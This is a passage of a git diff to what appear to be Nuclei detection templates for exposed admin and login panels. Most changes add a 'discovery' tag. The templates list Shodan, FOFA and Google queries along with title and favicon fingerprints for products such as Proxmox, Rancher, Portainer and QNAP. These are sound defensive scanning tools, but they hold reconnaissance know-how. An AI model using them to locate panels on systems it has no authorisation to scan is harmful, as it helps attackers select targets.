html:"Plausible" - tags: panel,plausible,detect + tags: panel,plausible,detect,discovery http: - method: GET diff --git a/http/exposed-panels/plesk-obsidian-login.yaml b/http/exposed-panels/plesk-obsidian-login.yaml index 0f84395613f..40597d43030 100644 --- a/http/exposed-panels/plesk-obsidian-login.yaml +++ b/http/exposed-panels/plesk-obsidian-login.yaml @@ -22,7 +22,7 @@ info: - body="plesk obsidian" - title="plesk obsidian" google-query: intitle:"plesk obsidian" - tags: panel,plesk,login,edb + tags: panel,plesk,login,edb,discovery http: - method: GET diff --git a/http/exposed-panels/plesk-onyx-login.yaml b/http/exposed-panels/plesk-onyx-login.yaml index edae0eb59c6..ff5344de9f7 100644 --- a/http/exposed-panels/plesk-onyx-login.yaml +++ b/http/exposed-panels/plesk-onyx-login.yaml @@ -24,7 +24,7 @@ info: - inurl:login_up.php "Plesk Onyx" - inurl:login_up.php "plesk onyx" fofa-query: body="plesk onyx" http.html:"plesk-build" - tags: panel,plesk,login,edb + tags: panel,plesk,login,edb,discovery http: - method: GET diff --git a/http/exposed-panels/pocketbase-panel.yaml b/http/exposed-panels/pocketbase-panel.yaml index 0bc312cac1a..d8e6fefcff5 100644 --- a/http/exposed-panels/pocketbase-panel.yaml +++ b/http/exposed-panels/pocketbase-panel.yaml @@ -1,5 +1,5 @@ -id: pocketbase-panel - +id: pocketbase-panel + info: name: PocketBase Panel - Detect author: userdehghani @@ -13,22 +13,22 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:981081715 - tags: panel,pocketbase,login,detect + tags: panel,pocketbase,login,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}/_/#/login" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<title>PocketBase' - case-insensitive: true - - - type: status - status: +http: + - method: GET + path: + - "{{BaseURL}}/_/#/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>PocketBase' + case-insensitive: true + + - type: status + status: - 200 # digest: 490a0046304402200dc9efb6fd60084df325a01fa5044416291f4349023399a6de141c0e51bc67b502202b44e1f02ad16e70da2cd0f1257ff50a489ef01c47bf2273867e4b002682ba7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/polarion-siemens-panel.yaml b/http/exposed-panels/polarion-siemens-panel.yaml index 1319830846d..f9df544a9c8 100644 --- a/http/exposed-panels/polarion-siemens-panel.yaml +++ b/http/exposed-panels/polarion-siemens-panel.yaml @@ -13,7 +13,7 @@ info: shodan-query: - http.favicon.hash:-1135703796 - http.favicon.hash:707299418 - tags: polarion,siemens,login,panel,detect + tags: polarion,siemens,login,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/polycom-admin-detect.yaml b/http/exposed-panels/polycom-admin-detect.yaml index 9c4edb712c8..4cc1c07a56c 100644 --- a/http/exposed-panels/polycom-admin-detect.yaml +++ b/http/exposed-panels/polycom-admin-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: polycom product: vvx - tags: panel,polycom + tags: panel,polycom,discovery http: - method: GET diff --git a/http/exposed-panels/polycom-login.yaml b/http/exposed-panels/polycom-login.yaml index ffe862af6bb..c5a5c72da5d 100644 --- a/http/exposed-panels/polycom-login.yaml +++ b/http/exposed-panels/polycom-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: edb,panel + tags: edb,panel,discovery http: - method: GET diff --git a/http/exposed-panels/portainer-panel.yaml b/http/exposed-panels/portainer-panel.yaml index dd11dc4d740..3704493c70d 100644 --- a/http/exposed-panels/portainer-panel.yaml +++ b/http/exposed-panels/portainer-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"portainer" fofa-query: title="portainer" google-query: intitle:"portainer" - tags: panel,portainer,detect + tags: panel,portainer,detect,discovery http: - method: GET diff --git a/http/exposed-panels/posteio-admin-panel.yaml b/http/exposed-panels/posteio-admin-panel.yaml index 24367264ac6..9902fbef115 100644 --- a/http/exposed-panels/posteio-admin-panel.yaml +++ b/http/exposed-panels/posteio-admin-panel.yaml @@ -13,7 +13,7 @@ info: vendor: analogic product: poste.io shodan-query: title:"Administration login" html:"poste<span" - tags: panel,poste,login,detect + tags: panel,poste,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/posthog-admin-panel.yaml b/http/exposed-panels/posthog-admin-panel.yaml index 6c2e295669d..e98d71df948 100644 --- a/http/exposed-panels/posthog-admin-panel.yaml +++ b/http/exposed-panels/posthog-admin-panel.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.title:"posthog" fofa-query: title="posthog" google-query: intitle:"posthog" - tags: panel,posthog + tags: panel,posthog,discovery http: - method: GET diff --git a/http/exposed-panels/powerchute-network-panel.yaml b/http/exposed-panels/powerchute-network-panel.yaml index 40e1d0f4577..853c717bd9b 100644 --- a/http/exposed-panels/powerchute-network-panel.yaml +++ b/http/exposed-panels/powerchute-network-panel.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: html:"PowerChute Network Shutdown" - tags: panel,login,powerchute,detect + tags: panel,login,powerchute,detect,discovery http: - method: GET diff --git a/http/exposed-panels/powercom-network-manager.yaml b/http/exposed-panels/powercom-network-manager.yaml index 96ae500190d..6d33dceb026 100644 --- a/http/exposed-panels/powercom-network-manager.yaml +++ b/http/exposed-panels/powercom-network-manager.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"PowerCom Network Manager" - tags: powercommanager,login,panel + tags: powercommanager,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/powerjob-panel.yaml b/http/exposed-panels/powerjob-panel.yaml index 5eec993bcba..99a645710b2 100644 --- a/http/exposed-panels/powerjob-panel.yaml +++ b/http/exposed-panels/powerjob-panel.yaml @@ -15,7 +15,7 @@ info: fofa-query: title="PowerJob" product: powerjob vendor: powerjob - tags: panel,powerjob + tags: panel,powerjob,discovery http: - method: GET diff --git a/http/exposed-panels/powerlogic-ion.yaml b/http/exposed-panels/powerlogic-ion.yaml index 1646a0e5a7e..b2b25f3a8ce 100644 --- a/http/exposed-panels/powerlogic-ion.yaml +++ b/http/exposed-panels/powerlogic-ion.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: schneider-electric product: ion7600 - tags: panel,edb,schneider-electric + tags: panel,edb,schneider-electric,discovery http: - method: GET diff --git a/http/exposed-panels/prestashop-admin-panel.yaml b/http/exposed-panels/prestashop-admin-panel.yaml index a3ff3c87b1d..44da6704321 100644 --- a/http/exposed-panels/prestashop-admin-panel.yaml +++ b/http/exposed-panels/prestashop-admin-panel.yaml @@ -20,7 +20,7 @@ info: - http.component:"Prestashop" - cpe:"cpe:2.3:a:prestashop:prestashop" - http.component:"prestashop" - tags: prestashop,panel,login + tags: prestashop,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/pritunl-panel.yaml b/http/exposed-panels/pritunl-panel.yaml index 45b025e6566..46e2a43c33b 100644 --- a/http/exposed-panels/pritunl-panel.yaml +++ b/http/exposed-panels/pritunl-panel.yaml @@ -17,7 +17,7 @@ info: shodan-query: title:"Pritunl" vendor: pritunl verified: true - tags: pritunl,panel,login + tags: pritunl,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/privategpt-detect.yaml b/http/exposed-panels/privategpt-detect.yaml index b4e3ed87d68..ee9266b2aff 100644 --- a/http/exposed-panels/privategpt-detect.yaml +++ b/http/exposed-panels/privategpt-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: html:"private gpt" product: private-gpt - tags: panel,privategpt,detect + tags: panel,privategpt,detect,discovery http: - method: GET diff --git a/http/exposed-panels/privx-panel.yaml b/http/exposed-panels/privx-panel.yaml index fce25fe4d2d..47006fb5d1d 100644 --- a/http/exposed-panels/privx-panel.yaml +++ b/http/exposed-panels/privx-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"PrivX" product: privx vendor: ssh - tags: panel,privx + tags: panel,privx,discovery http: - method: GET diff --git a/http/exposed-panels/processwire-login.yaml b/http/exposed-panels/processwire-login.yaml index cf018b126e7..f7b1cda1444 100644 --- a/http/exposed-panels/processwire-login.yaml +++ b/http/exposed-panels/processwire-login.yaml @@ -17,7 +17,7 @@ info: product: processwire shodan-query: http.html:"processwire" fofa-query: body="processwire" - tags: panel,processwire + tags: panel,processwire,discovery http: - method: GET diff --git a/http/exposed-panels/procore-panel.yaml b/http/exposed-panels/procore-panel.yaml index c21591fa331..377bb77bd2d 100644 --- a/http/exposed-panels/procore-panel.yaml +++ b/http/exposed-panels/procore-panel.yaml @@ -1,32 +1,32 @@ -id: procore-panel - -info: - name: Procore Login - Panel - author: rxerium - severity: info - metadata: - max-request: 2 - verified: true - shodan-query: http.favicon.hash:1952289652 - tags: panel,login,detect,procore - -http: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/favicon.ico" - - "{{BaseURL}}/images/favicon.ico" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - dsl: - - "status_code==200 && (\"1952289652\" == mmh3(base64_py(body)))" - - - type: word - words: - - '<title>Procore Log In' - - 'Log in to your Procore account using your email and password' +id: procore-panel + +info: + name: Procore Login - Panel + author: rxerium + severity: info + metadata: + max-request: 2 + verified: true + shodan-query: http.favicon.hash:1952289652 + tags: panel,login,detect,procore,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/images/favicon.ico" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + dsl: + - "status_code==200 && (\"1952289652\" == mmh3(base64_py(body)))" + + - type: word + words: + - 'Procore Log In' + - 'Log in to your Procore account using your email and password' condition: and # digest: 4a0a00473045022100adbe961c7f64953861935d0268d1bba9a9bc23d0310e0d086592fb87cd12611e0220296dc958a259fe90f27e46dd6423c6f5fb649ee390ffd601a46a846ad4801fc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/project-insight-login.yaml b/http/exposed-panels/project-insight-login.yaml index 9e9ae715a9c..1c3cf32b70c 100644 --- a/http/exposed-panels/project-insight-login.yaml +++ b/http/exposed-panels/project-insight-login.yaml @@ -20,7 +20,7 @@ info: - http.title:"project insight - login" fofa-query: title="project insight - login" google-query: intitle:"project insight - login" - tags: panel,edb,helpproject + tags: panel,edb,helpproject,discovery http: - method: GET diff --git a/http/exposed-panels/projectsend-login.yaml b/http/exposed-panels/projectsend-login.yaml index 818192f70fa..8971260dfd8 100644 --- a/http/exposed-panels/projectsend-login.yaml +++ b/http/exposed-panels/projectsend-login.yaml @@ -21,7 +21,7 @@ info: - intext:provided by projectsend shodan-query: http.html:provided by projectsend fofa-query: body=provided by projectsend - tags: panel,projectsend,edb + tags: panel,projectsend,edb,discovery http: - method: GET diff --git a/http/exposed-panels/prometheus-exposed-panel.yaml b/http/exposed-panels/prometheus-exposed-panel.yaml index 5f1c200f042..46c943dcfd0 100644 --- a/http/exposed-panels/prometheus-exposed-panel.yaml +++ b/http/exposed-panels/prometheus-exposed-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 2 vendor: prometheus product: prometheus - tags: panel,prometheus + tags: panel,prometheus,discovery http: - method: GET diff --git a/http/exposed-panels/prometheus-pushgateway-exposed-panel.yaml b/http/exposed-panels/prometheus-pushgateway-exposed-panel.yaml index 1a07d6624b1..aef26d03fe1 100644 --- a/http/exposed-panels/prometheus-pushgateway-exposed-panel.yaml +++ b/http/exposed-panels/prometheus-pushgateway-exposed-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,prometheus,pushgateway + tags: panel,prometheus,pushgateway,discovery http: - method: GET diff --git a/http/exposed-panels/pronote-panel.yaml b/http/exposed-panels/pronote-panel.yaml index 8425c71f707..aa4d4118c90 100644 --- a/http/exposed-panels/pronote-panel.yaml +++ b/http/exposed-panels/pronote-panel.yaml @@ -1,36 +1,36 @@ -id: pronote-panel - -info: - name: PRONOTE Login Panel - Detect - author: righettod - severity: info - description: | - PRONOTE products was detected. - reference: - - https://www.index-education.com/fr/logiciel-gestion-vie-scolaire.php - metadata: - max-request: 1 - shodan-query: http.title:"PRONOTE" - tags: panel,pronote,login - -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "pronote", "content=\"pronote\"")' - condition: and - - extractors: - - type: regex - part: header - group: 1 - regex: +id: pronote-panel + +info: + name: PRONOTE Login Panel - Detect + author: righettod + severity: info + description: | + PRONOTE products was detected. + reference: + - https://www.index-education.com/fr/logiciel-gestion-vie-scolaire.php + metadata: + max-request: 1 + shodan-query: http.title:"PRONOTE" + tags: panel,pronote,login,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "<title>pronote", "content=\"pronote\"")' + condition: and + + extractors: + - type: regex + part: header + group: 1 + regex: - '(?i)Server:\s+PRONOTE\s+([0-9.\s\-]+)' # digest: 4a0a00473045022100f9a267b9af1d04acb0c94bec06857f9ec115ebc424413a24646706f0f5970fb602203e8c2a27586ee7aa0993d3de5f191b6c5a4c9bfc7832ed3a21303773aee08cbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/proofpoint-protection-server-panel.yaml b/http/exposed-panels/proofpoint-protection-server-panel.yaml index 94471bbe704..e1e813bf1e8 100644 --- a/http/exposed-panels/proofpoint-protection-server-panel.yaml +++ b/http/exposed-panels/proofpoint-protection-server-panel.yaml @@ -15,7 +15,7 @@ info: product: proofpoint protection server shodan-query: http.favicon.hash:942678640 fofa-query: icon_hash=942678640 - tags: panel,proofpoint,login,detect + tags: panel,proofpoint,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/proxmox-panel.yaml b/http/exposed-panels/proxmox-panel.yaml index d7226e2e34d..f4d3032f021 100644 --- a/http/exposed-panels/proxmox-panel.yaml +++ b/http/exposed-panels/proxmox-panel.yaml @@ -19,7 +19,7 @@ info: product: proxmox shodan-query: http.favicon.hash:213144638 fofa-query: icon_hash=213144638 - tags: panel,proxmox,login + tags: panel,proxmox,login,discovery http: - method: GET diff --git a/http/exposed-panels/pterodactyl-panel.yaml b/http/exposed-panels/pterodactyl-panel.yaml index 36278ecf833..d9a11ef3df8 100644 --- a/http/exposed-panels/pterodactyl-panel.yaml +++ b/http/exposed-panels/pterodactyl-panel.yaml @@ -23,7 +23,7 @@ info: - icon_hash="-456405319" - icon_hash="846001371" - "Set-Cookie: pterodactyl_session=" - tags: detect,pterodactyl,panel,oos + tags: detect,pterodactyl,panel,oos,discovery http: - method: GET diff --git a/http/exposed-panels/pulsar-admin-console.yaml b/http/exposed-panels/pulsar-admin-console.yaml index a9d0065e786..2fc97b948eb 100644 --- a/http/exposed-panels/pulsar-admin-console.yaml +++ b/http/exposed-panels/pulsar-admin-console.yaml @@ -24,7 +24,7 @@ info: google-query: - intitle:"pulsar admin ui" - intitle:"pulsar admin console" - tags: panel,pulsar,console,admin,apache + tags: panel,pulsar,console,admin,apache,discovery http: - method: GET diff --git a/http/exposed-panels/pulsar-adminui-panel.yaml b/http/exposed-panels/pulsar-adminui-panel.yaml index 66701c8b310..d34ec1228ee 100644 --- a/http/exposed-panels/pulsar-adminui-panel.yaml +++ b/http/exposed-panels/pulsar-adminui-panel.yaml @@ -24,7 +24,7 @@ info: google-query: - intitle:"pulsar admin ui" - intitle:"pulsar admin console" - tags: panel,pulsar,pulsarui,admin,apache + tags: panel,pulsar,pulsarui,admin,apache,discovery http: - method: GET diff --git a/http/exposed-panels/pulsar360-admin-panel.yaml b/http/exposed-panels/pulsar360-admin-panel.yaml index 5bb2e1738be..fd7388490fc 100644 --- a/http/exposed-panels/pulsar360-admin-panel.yaml +++ b/http/exposed-panels/pulsar360-admin-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Pulsar Admin" - tags: panel,pulsar360,pulsar,admin + tags: panel,pulsar360,pulsar,admin,discovery http: - method: GET diff --git a/http/exposed-panels/pulse-secure-panel.yaml b/http/exposed-panels/pulse-secure-panel.yaml index e030ef58d2b..9922c92abde 100644 --- a/http/exposed-panels/pulse-secure-panel.yaml +++ b/http/exposed-panels/pulse-secure-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 3 - tags: panel,pulse,vpn + tags: panel,pulse,vpn,discovery http: - method: GET diff --git a/http/exposed-panels/pulse-secure-version.yaml b/http/exposed-panels/pulse-secure-version.yaml index 4d41530dcfa..edc28026bae 100644 --- a/http/exposed-panels/pulse-secure-version.yaml +++ b/http/exposed-panels/pulse-secure-version.yaml @@ -11,7 +11,7 @@ info: vendor: pulsesecure product: pulse_connect_secure shodan-query: cpe:"cpe:2.3:a:pulsesecure:pulse_connect_secure" - tags: pulse,panel,pulsesecure + tags: pulse,panel,pulsesecure,discovery http: - method: GET diff --git a/http/exposed-panels/puppetboard-panel.yaml b/http/exposed-panels/puppetboard-panel.yaml index 99be2bd5d62..655008f796f 100644 --- a/http/exposed-panels/puppetboard-panel.yaml +++ b/http/exposed-panels/puppetboard-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Puppetboard" - tags: panel,puppet,exposure + tags: panel,puppet,exposure,discovery http: - method: GET diff --git a/http/exposed-panels/pure-storage-login.yaml b/http/exposed-panels/pure-storage-login.yaml index 05ca37a12bd..1c7d793ba1a 100644 --- a/http/exposed-panels/pure-storage-login.yaml +++ b/http/exposed-panels/pure-storage-login.yaml @@ -18,7 +18,7 @@ info: - http.title:"pure storage login" fofa-query: title="pure storage login" google-query: intitle:"pure storage login" - tags: panel,purestorage + tags: panel,purestorage,discovery http: - method: GET diff --git a/http/exposed-panels/pyload-panel.yaml b/http/exposed-panels/pyload-panel.yaml index f4aaa87e556..1c6af6738be 100644 --- a/http/exposed-panels/pyload-panel.yaml +++ b/http/exposed-panels/pyload-panel.yaml @@ -28,7 +28,7 @@ info: - intitle:"pyload" - intitle:"login - pyload" zoomeye-query: app="pyLoad" - tags: panel,pyload,login + tags: panel,pyload,login,discovery http: - method: GET diff --git a/http/exposed-panels/pypicloud-panel.yaml b/http/exposed-panels/pypicloud-panel.yaml index 2d485dd7fd0..1c64eaa267c 100644 --- a/http/exposed-panels/pypicloud-panel.yaml +++ b/http/exposed-panels/pypicloud-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 google-query: intext:pypicloud - tags: panel,pypicloud + tags: panel,pypicloud,discovery http: - method: GET diff --git a/http/exposed-panels/qBittorrent-panel.yaml b/http/exposed-panels/qBittorrent-panel.yaml index 2621761e7a4..bda7141bcc1 100644 --- a/http/exposed-panels/qBittorrent-panel.yaml +++ b/http/exposed-panels/qBittorrent-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"qbittorrent" fofa-query: title="qbittorrent" google-query: intitle:"qbittorrent" - tags: panel,qbittorrent,detect + tags: panel,qbittorrent,detect,discovery http: - method: GET diff --git a/http/exposed-panels/qdpm-login-panel.yaml b/http/exposed-panels/qdpm-login-panel.yaml index 3417177b669..3d3c15d36ec 100644 --- a/http/exposed-panels/qdpm-login-panel.yaml +++ b/http/exposed-panels/qdpm-login-panel.yaml @@ -13,7 +13,7 @@ info: product: qdpm shodan-query: http.favicon.hash:762074255 fofa-query: icon_hash=762074255 - tags: panel,qdpm,login + tags: panel,qdpm,login,discovery http: - method: GET diff --git a/http/exposed-panels/qlik-sense-server.yaml b/http/exposed-panels/qlik-sense-server.yaml index b5eabee67f2..e354f52b8c4 100644 --- a/http/exposed-panels/qlik-sense-server.yaml +++ b/http/exposed-panels/qlik-sense-server.yaml @@ -29,7 +29,7 @@ info: - icon_hash=-74348711 - body="qlik" google-query: intitle:"qlik-sense" - tags: panel,qlik + tags: panel,qlik,discovery http: - method: GET diff --git a/http/exposed-panels/qlikview-accesspoint-panel.yaml b/http/exposed-panels/qlikview-accesspoint-panel.yaml index 3104060359e..695337261a4 100644 --- a/http/exposed-panels/qlikview-accesspoint-panel.yaml +++ b/http/exposed-panels/qlikview-accesspoint-panel.yaml @@ -16,7 +16,7 @@ info: vendor: qlik product: qlikview shodan-query: title:"QlikView - AccessPoint" - tags: panel,qlikview,login,detect + tags: panel,qlikview,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/qmail-admin-login.yaml b/http/exposed-panels/qmail-admin-login.yaml index da4b6c2a280..606260d5459 100644 --- a/http/exposed-panels/qmail-admin-login.yaml +++ b/http/exposed-panels/qmail-admin-login.yaml @@ -19,7 +19,7 @@ info: - http.title:"qmailadmin" fofa-query: title="qmailadmin" google-query: intitle:"qmailadmin" - tags: qmail,panel,qmail_project + tags: qmail,panel,qmail_project,discovery http: - method: GET diff --git a/http/exposed-panels/qnap/qnap-photostation-panel.yaml b/http/exposed-panels/qnap/qnap-photostation-panel.yaml index 554ba6b7315..75343e334aa 100644 --- a/http/exposed-panels/qnap/qnap-photostation-panel.yaml +++ b/http/exposed-panels/qnap/qnap-photostation-panel.yaml @@ -28,7 +28,7 @@ info: google-query: - intitle:"qnap" - intitle:"photo station" - tags: panel,photostation,qnap + tags: panel,photostation,qnap,discovery http: - method: GET diff --git a/http/exposed-panels/qnap/qnap-qts-panel.yaml b/http/exposed-panels/qnap/qnap-qts-panel.yaml index 61430e9ec2a..b85e5d56c95 100644 --- a/http/exposed-panels/qnap/qnap-qts-panel.yaml +++ b/http/exposed-panels/qnap/qnap-qts-panel.yaml @@ -25,7 +25,7 @@ info: - intitle:"QNAP Turbo NAS" inurl:/cgi-bin - intitle:"qnap turbo nas" inurl:/cgi-bin fofa-query: title="qnap turbo nas" inurl:/cgi-bin - tags: panel,qnap,qts + tags: panel,qnap,qts,discovery http: - method: GET diff --git a/http/exposed-panels/qualcomm-voip-router.yaml b/http/exposed-panels/qualcomm-voip-router.yaml index 92f6f49f8b2..9514be64175 100644 --- a/http/exposed-panels/qualcomm-voip-router.yaml +++ b/http/exposed-panels/qualcomm-voip-router.yaml @@ -14,7 +14,7 @@ info: fofa-query: app="Qualcomm-4G-LTE-WiFi-VoIP-Router" product: qca4531_firmware vendor: qualcomm - tags: panel,qualcomm,iot,router,voip + tags: panel,qualcomm,iot,router,voip,discovery http: - method: GET diff --git a/http/exposed-panels/qualitor-itsm-panel.yaml b/http/exposed-panels/qualitor-itsm-panel.yaml index 69141cdfc17..58247b8f803 100644 --- a/http/exposed-panels/qualitor-itsm-panel.yaml +++ b/http/exposed-panels/qualitor-itsm-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:"-1217039701" - tags: panel,qualitor + tags: panel,qualitor,discovery http: - method: GET diff --git a/http/exposed-panels/qualtrics-login.yaml b/http/exposed-panels/qualtrics-login.yaml index 4d9f62866e5..1f56ae548f9 100644 --- a/http/exposed-panels/qualtrics-login.yaml +++ b/http/exposed-panels/qualtrics-login.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: panel,qualtrics + tags: panel,qualtrics,discovery http: - method: GET diff --git a/http/exposed-panels/quantum-scalar-detect.yaml b/http/exposed-panels/quantum-scalar-detect.yaml index 70f2b8fd47c..ee9f0547e27 100644 --- a/http/exposed-panels/quantum-scalar-detect.yaml +++ b/http/exposed-panels/quantum-scalar-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: quantum product: scalar_i500 - tags: panel,quantum,scalar + tags: panel,quantum,scalar,discovery http: - method: GET diff --git a/http/exposed-panels/quest-panel.yaml b/http/exposed-panels/quest-panel.yaml index 204920ade92..1eeaeb8f73a 100644 --- a/http/exposed-panels/quest-panel.yaml +++ b/http/exposed-panels/quest-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Advanced Setup - Security - Admin User Name & Password" - tags: panel,quest,login,detect + tags: panel,quest,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/quilium-panel.yaml b/http/exposed-panels/quilium-panel.yaml index b67033c577e..756f2db0207 100644 --- a/http/exposed-panels/quilium-panel.yaml +++ b/http/exposed-panels/quilium-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: http.html:"CMS Quilium" - tags: panel,quilium,login,detect + tags: panel,quilium,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/quivr-panel.yaml b/http/exposed-panels/quivr-panel.yaml index 055d38f69d8..644932b0ba5 100644 --- a/http/exposed-panels/quivr-panel.yaml +++ b/http/exposed-panels/quivr-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: icon_hash="848114197" - tags: panel,login,quivr,detect + tags: panel,login,quivr,detect,discovery http: - method: GET diff --git a/http/exposed-panels/r-webserver-login.yaml b/http/exposed-panels/r-webserver-login.yaml index 8e7e777107d..61884f990e3 100644 --- a/http/exposed-panels/r-webserver-login.yaml +++ b/http/exposed-panels/r-webserver-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: edb,panel,rwebserver + tags: edb,panel,rwebserver,discovery http: - method: GET diff --git a/http/exposed-panels/rabbitmq-dashboard.yaml b/http/exposed-panels/rabbitmq-dashboard.yaml index 0b9f418a2f5..f38e2b11797 100644 --- a/http/exposed-panels/rabbitmq-dashboard.yaml +++ b/http/exposed-panels/rabbitmq-dashboard.yaml @@ -14,7 +14,7 @@ info: vendor: vmware product: rabbitmq shodan-query: cpe:"cpe:2.3:a:vmware:rabbitmq" - tags: panel,rabbitmq,vmware + tags: panel,rabbitmq,vmware,discovery http: - method: GET diff --git a/http/exposed-panels/racksnet-login.yaml b/http/exposed-panels/racksnet-login.yaml index e247bc5b768..7f244031342 100644 --- a/http/exposed-panels/racksnet-login.yaml +++ b/http/exposed-panels/racksnet-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 shodan-query: http.title:"My Datacenter - Login" google-query: intitle:"My Datacenter - Login" - tags: panel,racksnet + tags: panel,racksnet,discovery http: - method: GET diff --git a/http/exposed-panels/radius-manager.yaml b/http/exposed-panels/radius-manager.yaml index 2cf25d1e002..2f41d870208 100644 --- a/http/exposed-panels/radius-manager.yaml +++ b/http/exposed-panels/radius-manager.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 4 - tags: panel,radius,edb + tags: panel,radius,edb,discovery http: - method: GET diff --git a/http/exposed-panels/rancher-dashboard.yaml b/http/exposed-panels/rancher-dashboard.yaml index cfd9decb6a6..3b2b797cd75 100644 --- a/http/exposed-panels/rancher-dashboard.yaml +++ b/http/exposed-panels/rancher-dashboard.yaml @@ -20,7 +20,7 @@ info: - http.favicon.hash:-1324930554 - http.favicon.hash:464587962 fofa-query: icon_hash=464587962 - tags: panel,rancher,dashboard,login + tags: panel,rancher,dashboard,login,discovery http: - method: GET diff --git a/http/exposed-panels/rancher-panel.yaml b/http/exposed-panels/rancher-panel.yaml index ac314e0ac1b..b6480a5370c 100644 --- a/http/exposed-panels/rancher-panel.yaml +++ b/http/exposed-panels/rancher-panel.yaml @@ -19,7 +19,7 @@ info: product: rancher shodan-query: http.favicon.hash:464587962 fofa-query: icon_hash=464587962 - tags: panel,rancher,kubernetes,devops,cloud,login,suse + tags: panel,rancher,kubernetes,devops,cloud,login,suse,discovery http: - method: GET diff --git a/http/exposed-panels/raspberrymatic-panel.yaml b/http/exposed-panels/raspberrymatic-panel.yaml index e0772f26921..22cffec8e1a 100644 --- a/http/exposed-panels/raspberrymatic-panel.yaml +++ b/http/exposed-panels/raspberrymatic-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.favicon.hash:-578216669 product: raspberrymatic vendor: raspberrymatic - tags: panel,raspberrymatic,iot + tags: panel,raspberrymatic,iot,discovery http: - method: GET diff --git a/http/exposed-panels/rcdevs-webadm-panel.yaml b/http/exposed-panels/rcdevs-webadm-panel.yaml index aae76e480a8..40d7ef39c32 100644 --- a/http/exposed-panels/rcdevs-webadm-panel.yaml +++ b/http/exposed-panels/rcdevs-webadm-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 4 shodan-query: http.html:"WebADM" - tags: panel,rcdevs,webadm,login,detect + tags: panel,rcdevs,webadm,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/rdweb-panel.yaml b/http/exposed-panels/rdweb-panel.yaml index 5fb601ab300..43d923bc28d 100644 --- a/http/exposed-panels/rdweb-panel.yaml +++ b/http/exposed-panels/rdweb-panel.yaml @@ -19,7 +19,7 @@ info: - html:"RD Web Access" - http.html:"rd web access" fofa-query: body="rd web access" - tags: panel,login,rdp,web-access,Microsoft,detect,microsoft + tags: panel,login,rdp,web-access,Microsoft,detect,microsoft,discovery http: - method: GET diff --git a/http/exposed-panels/red-lion-panel.yaml b/http/exposed-panels/red-lion-panel.yaml index c42e865c4e2..d379e33532a 100644 --- a/http/exposed-panels/red-lion-panel.yaml +++ b/http/exposed-panels/red-lion-panel.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true max-request: 1 - tags: panel,redlion,detect,iot + tags: panel,redlion,detect,iot,discovery http: - method: GET diff --git a/http/exposed-panels/redash-panel.yaml b/http/exposed-panels/redash-panel.yaml index 57691237f9b..f53fb03b2b1 100644 --- a/http/exposed-panels/redash-panel.yaml +++ b/http/exposed-panels/redash-panel.yaml @@ -15,7 +15,7 @@ info: product: redash shodan-query: http.favicon.hash:698624197 fofa-query: icon_hash=698624197 - tags: panel,redash + tags: panel,redash,discovery http: - method: GET diff --git a/http/exposed-panels/redhat/redhat-satellite-panel.yaml b/http/exposed-panels/redhat/redhat-satellite-panel.yaml index 0b30cb00142..a3a16988d39 100644 --- 